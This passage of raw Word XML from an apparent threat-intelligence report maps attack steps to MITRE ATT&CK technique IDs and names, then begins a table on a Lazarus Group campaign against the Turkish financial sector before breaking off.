    <w:p w14:paraId="729F5AA9"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1057 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Process Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6665FFD3"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1012 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Query Registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72143A5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590415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00590415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1082 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00590415">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> System Information Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0FCD2B"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5E7360">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005E7360">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1083 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005E7360">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> File and Directory Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323E93E8"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0008 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Lateral Movement ['T1534', 'T1021.004', 'T1021.001', 'T1021.002']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BD0858"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1534 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Internal </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5FF5E25F"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T1021.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Remote Services&gt;:SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FA3E82"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T1021.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Remote Services&gt;:Remote Desktop Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793D05E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T1021.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Remote Services&gt;:SMB/Windows Admin Shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351922F3"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0009 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Collection ['T1557.001', 'T1560.003', 'T1005', 'T1074.001', 'T1560', 'T1056.001', 'T1560.002']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205E93A1"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T1557.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Adversary-in-the-Middle&gt;:LLMNR/NBT-NS Poisoning and SMB Relay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675248A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T1560.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Archive Collected Data&gt;:Archive via Custom Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABAEFB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1005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Data from Local System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508BE5C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T1074.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Data Staged&gt;:Local Data Staging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FBAF88"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1560 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Archive Collected Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F89C7E0"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T1056.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Input Capture&gt;:Keylogging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C5C38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T1560.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Archive Collected Data&gt;:Archive via Library</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EBD6A3"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0011 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Command and Control ['T1104', 'T1102.002', 'T1090.001', 'T1571', 'T1001.003', 'T1132.001', 'T1071.001', 'T1090.002', 'T1008', 'T1105', 'T1573.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6695D998"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1104 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Multi-Stage Channels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC986C5"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5E7360">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1102.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005E7360">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Web Service&gt;:Bidirectional Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5743F248"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T1090.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Proxy&gt;:Internal Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B28F44"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1571 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Non-Standard Port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312F1F1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T1001.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Data Obfuscation&gt;:Protocol Impersonation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C9553A"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T1132.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Data Encoding&gt;:Standard Encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D78D08"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5E7360">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1071.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005E7360">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Web Protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454A223B"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T1090.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Proxy&gt;:External Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480FFF5C"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1008 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Fallback Channels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C459AB"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F12280">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12280">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1105 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12280">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB0C885"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T1573.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Encrypted Channel&gt;:Symmetric Cryptography</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C09502A"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0010 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exfiltration ['T1567.002', 'T1048.003', 'T1041']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C55176D"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T1567.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Exfiltration Over Web Service&gt;:Exfiltration to Cloud Storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477084F7"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T1048.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Exfiltration Over Alternative Protocol&gt;:Exfiltration Over Unencrypted Non-C2 Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A9E5CD"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r w:rsidRPr="00F12280">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12280">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1041 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12280">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exfiltration Over C2 Channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE1BCCC" w14:textId="77777777" w:rsidR="00B1289F" w:rsidRPr="00B1289F" w:rsidRDefault="00B1289F" w:rsidP="00B1289F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next tactic is TA</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0040 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Impact ['T1491.001', 'T1529', 'T1485', 'T1561.001', 'T1561.002', 'T1489']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111490FD"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T1491.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Defacement&gt;:Internal Defacement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0AFA32"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1529 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Shutdown/Reboot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092D4A87"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1485 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Data Destruction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2990C1E9"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T1561.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Disk Wipe&gt;:Disk Content Wipe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316BC935" w14:textId="77777777" w:rsidR="00B1289F" w:rsidRP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 xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1561.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Disk Wipe&gt;:Disk Structure Wipe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0658ADC0" w14:textId="38376382" w:rsidR="00B1289F" w:rsidRDefault="00B1289F" w:rsidP="00421F64">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next Technique is T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1489 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B1289F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Service Stop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF15103" w14:textId="77777777" w:rsidR="00F91C84" w:rsidRPr="00F91C84" w:rsidRDefault="00F91C84" w:rsidP="00421F64">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EAD9BC7" w14:textId="773FFE5A" w:rsidR="00C37023" w:rsidRDefault="00C37023" w:rsidP="00C37023">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="109" w:name="_Toc153480884"/>
      <w:r>
        <w:t xml:space="preserve">T1566.001 - </w:t>
      </w:r>
      <w:r w:rsidR="00BB679C" w:rsidRPr="00BB679C">
        <w:t xml:space="preserve">Hidden Cobra Targets Turkish Financial Sector </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00BB679C" w:rsidRPr="00BB679C">
        <w:t>With</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00BB679C" w:rsidRPr="00BB679C">
        <w:t xml:space="preserve"> New Bankshot Implant</w:t>
      </w:r>
      <w:bookmarkEnd w:id="109"/>
    </w:p>
    <w:p w14:paraId="553DDE35" w14:textId="77777777" w:rsidR="00C37023" w:rsidRDefault="00C37023" w:rsidP="00C37023">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C37023" w:rsidRPr="002D1D50" w14:paraId="4EB44706" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41828AF2" w14:textId="77777777" w:rsidR="00C37023" w:rsidRPr="002D1D50" w:rsidRDefault="00C37023" w:rsidP="00B02EC5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48192AC6" w14:textId="5A247A6A" w:rsidR="00C37023" w:rsidRPr="002D1D50" w:rsidRDefault="001F5FE0" w:rsidP="00B02EC5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="088AC500" w14:textId="77777777" w:rsidR="00C37023" w:rsidRPr="00387DCC" w:rsidRDefault="00C37023" w:rsidP="00B02EC5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00387DCC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5FE0" w:rsidRPr="00B857D7" w14:paraId="4BB923A9" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18349941" w14:textId="77777777" w:rsidR="001F5FE0" w:rsidRDefault="001F5FE0" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34E816B9" w14:textId="5826D127" w:rsidR="001F5FE0" w:rsidRDefault="001F5FE0" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Lazarus Group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46BC9551" w14:textId="77777777" w:rsidR="001F5FE0" w:rsidRPr="00387DCC" w:rsidRDefault="001F5FE0" w:rsidP="002E403F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C37023" w:rsidRPr="00B857D7" w14:paraId="06ACC6B8" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75158998" w14:textId="77777777" w:rsidR="00C37023" w:rsidRPr="007328DE" w:rsidRDefault="00C37023" w:rsidP="00B02EC5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
